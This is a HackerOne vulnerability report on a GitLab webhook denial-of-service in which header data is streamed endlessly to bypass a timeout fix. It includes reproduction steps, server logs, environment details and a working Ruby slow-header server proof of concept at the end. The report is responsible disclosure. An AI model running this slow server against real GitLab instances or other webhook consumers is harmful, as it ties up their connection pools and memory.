Evil webhook DoS 2: Giant Headers
HackerOne report #1252116 by afewgoats on 2021-07-05, assigned to H1 Triage:
Report | Attachments | How To Reproduce
Report
Summary
Gitlab Webhooks do not properly obey timeouts, so connections can be forced to last forever.
The previous bug 1029269 was patched but I found a way to bypass the fix. Instead of sending data slowly in the HTTP body, send data forever in the HTTP header section.
In the patch, a block is passed to HTTParty. However, this block is only called after the headers have been processed and the body data starts to arrive.
A malicious webhook receiver can respond in a way such that:
- The HTTP(S) connection between the Gitlab sidekiq process and the webhook server NEVER ends
- Large amounts of data are kept in memory
It's not just project webhooks. Any use of Gitlab::HTTP.post such as system webhooks and integrations (e.g. Mattermost) are affected.
Steps to reproduce
The node server attached sends data at a rate of 1 byte per 3.21 seconds without ending the HTTP header section: HTTP/1.1 200 OK\r\nxxxxxxxxxxxxxxxxxxxx...
- Start the malicious webserver with
node never-end-headers.js - Create a project and add webhooks for issue events to http://maliciousserver:3000/xyz
- Create an issue (or close or reopen one) to trigger the webhook.
- The webhook connection will stay open forever.
Also try adding /mega to the path which makes it send 550 MB over the first 5 minutes and then send the usual 1 byte per 3.21 seconds. This can reserve 550 MB in process memory. You can of course modify the script to send endless amounts of data much faster.
For your convenience you can use my test server again but please again redact the domain: https://viii.sr/never-end/justheaders/gitlab
Examples
I did run it briefly on Gitlab.org (User-Agent: GitLab/14.1.0-pre), but killed the connection after half an hour.
What is the current bug behavior?
There is no overall timeout on the webhook connection except when using the Test Webhook function. (Also accepts huge response data in header section)
What is the expected correct behavior?
After 10 seconds (or some other reasonable timeout), webhook requests timeout even if headers are still being transferred. Many HTTP clients also have a header size limit.
Relevant logs and/or screenshots
Never ending jobs:
After deliberately killing the connection:
{"severity":"ERROR","time":"2021-07-05T22:02:16.462Z","correlation_id":"d055442cfe2e0bf0cd4d1c9273abaa28","exception.class":"Gitlab::HTTP::ReadTotalTimeout","exception.message":"Gitlab::HTTP::ReadTotalTimeout with \"Request timed out after 332.36488593695685 seconds\"","exception.b
acktrace":["lib/gitlab/http.rb:55:in `block in perform_request'","lib/gitlab/http.rb:53:in `perform_request'","app/services/web_hook_service.rb:109:in `make_request'","app/services/web_hook_service.rb:56:in `execute'","app/workers/web_hook_worker.rb:19:in `perform'","lib/gitlab/sid
ekiq_middleware/duplicate_jobs/strategies/until_executing.rb:16:in `perform'","lib/gitlab/sidekiq_middleware/duplicate_jobs/duplicate_job.rb:41:in `perform'","lib/gitlab/sidekiq_middleware/duplicate_jobs/server.rb:8:in `call'","lib/gitlab/sidekiq_middleware/worker_context.rb:9:in `
wrap_in_optional_context'","lib/gitlab/sidekiq_middleware/worker_context/server.rb:17:in `block in call'","lib/gitlab/application_context.rb:74:in `block in use'","lib/gitlab/application_context.rb:74:in `use'","lib/gitlab/application_context.rb:27:in `with_context'","lib/gitlab/si
dekiq_middleware/worker_context/server.rb:15:in `call'","lib/gitlab/sidekiq_status/server_middleware.rb:7:in `call'","lib/gitlab/sidekiq_versioning/middleware.rb:9:in `call'","lib/gitlab/sidekiq_middleware/admin_mode/server.rb:14:in `call'","lib/gitlab/sidekiq_middleware/instrument
ation_logger.rb:9:in `call'","lib/gitlab/sidekiq_middleware/batch_loader.rb:7:in `call'","lib/gitlab/sidekiq_middleware/extra_done_log_metadata.rb:7:in `call'","lib/gitlab/sidekiq_middleware/request_store_middleware.rb:10:in `block in call'","lib/gitlab/with_request_store.rb:17:in
`enabling_request_store'","lib/gitlab/with_request_store.rb:10:in `with_request_store'","lib/gitlab/sidekiq_middleware/request_store_middleware.rb:9:in `call'","lib/gitlab/sidekiq_middleware/server_metrics.rb:29:in `block in call'","lib/gitlab/sidekiq_middleware/server_metrics.rb:5
2:in `block in instrument'","lib/gitlab/metrics/background_transaction.rb:30:in `run'","lib/gitlab/sidekiq_middleware/server_metrics.rb:52:in `instrument'","lib/gitlab/sidekiq_middleware/server_metrics.rb:28:in `call'","lib/gitlab/sidekiq_middleware/monitor.rb:8:in `block in call'"
,"lib/gitlab/sidekiq_daemon/monitor.rb:49:in `within_job'","lib/gitlab/sidekiq_middleware/monitor.rb:7:in `call'","lib/gitlab/sidekiq_middleware/size_limiter/server.rb:13:in `call'","lib/gitlab/sidekiq_logging/structured_logger.rb:19:in `call'"],"user.username":"root","tags.program
":"sidekiq","tags.locale":"en","tags.feature_category":"integrations","tags.correlation_id":"d055442cfe2e0bf0cd4d1c9273abaa28","extra.sidekiq":{"class":"WebHookWorker","args":["2","[FILTERED]","issue_hooks"],"retry":4,"queue":"web_hook","version":0,"dead":false,"jid":"710ebd1ab8d7a
f75e2fd9e18","created_at":1625522198.495918,"meta.user":"root","meta.project":"root/hookz","meta.root_namespace":"root","meta.caller_id":"GraphqlController#execute","meta.remote_ip":"172.17.0.1","meta.related_class":"ProjectHook","meta.feature_category":"not_owned","meta.client_id"
:"user/1","correlation_id":"d055442cfe2e0bf0cd4d1c9273abaa28","idempotency_key":"resque:gitlab:duplicate:web_hook:42f4ec1690d28151b9660ac15937309479fb9587947c60a56e9aa77c318ddeb5","enqueued_at":1625522204.049519}}
Output of checks
This bug happens on GitLab.com and locally
Results of GitLab environment info
Gitlab-ee docker image
root@gitlab:/# gitlab-rake gitlab:env:info
System information
System:
Proxy: no
Current User: git
Using RVM: no
Ruby Version: 2.7.2p137
Gem Version: 3.1.4
Bundler Version:2.1.4
Rake Version: 13.0.3
Redis Version: 6.0.14
Git Version: 2.32.0
Sidekiq Version:5.2.9
Go Version: unknown
GitLab information
Version: 14.0.2-ee
Revision: 2504e045362
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 12.6
URL: https://gitlab.example.com
HTTP Clone URL: https://gitlab.example.com/some-group/some-project.git
SSH Clone URL: git@gitlab.example.com:some-group/some-project.git
Elasticsearch: no
Geo: no
Using LDAP: no
Using Omniauth: yes
Omniauth Providers:
GitLab Shell
Version: 13.19.0
Repository storage paths:
- default: /var/opt/gitlab/git-data/repositories
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
Git: /opt/gitlab/embedded/bin/git
Impact
DoS against connection pool, memory. Connections can last days and you can start multiple connections.
The only difference in impact from the previous report is that the headers now don't get saved in the database. If after a few hours the malicious server cleanly ends the connection with a nice \r\n\r\n, the timeout-checking block will be run and Gitlab::HTTP::ReadTotalTimeout will be belatedly raised.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section:
The report had clear reproduction steps, I'd only add that to make things easier to reproduce locally it can be good to enable connections to the local network in the admin settings.
Reproducing this on the Rails console
- Copy the malicious server example and save it in a file
slow_server.rb. - Start the server
ruby slow_server.rb. - In a new terminal window, open the rails console
bundle exec rails c. - Send a request
Gitlab::HTTP.get('http://localhost:9292'). - Observe that the request is blocked forever.
Malicious server example:
require 'socket'
server = TCPServer.new 9292
def start_session(server)
while session = server.accept
request = session.gets
puts request
session.print "HTTP/1.1 200\r\n"
session.print "Content-Type: text/html" # 2
(1..400).each do |i|
session.print 'h' # 2
sleep 1
end
session.print "\r\n" # 2
session.print "\r\n" # 3
session.print "Hello world! The time is #{Time.now}" #4
session.close
end
end
def listen(server)
start_session(server)
rescue Errno::EPIPE
listen(server)
end
listen(server)

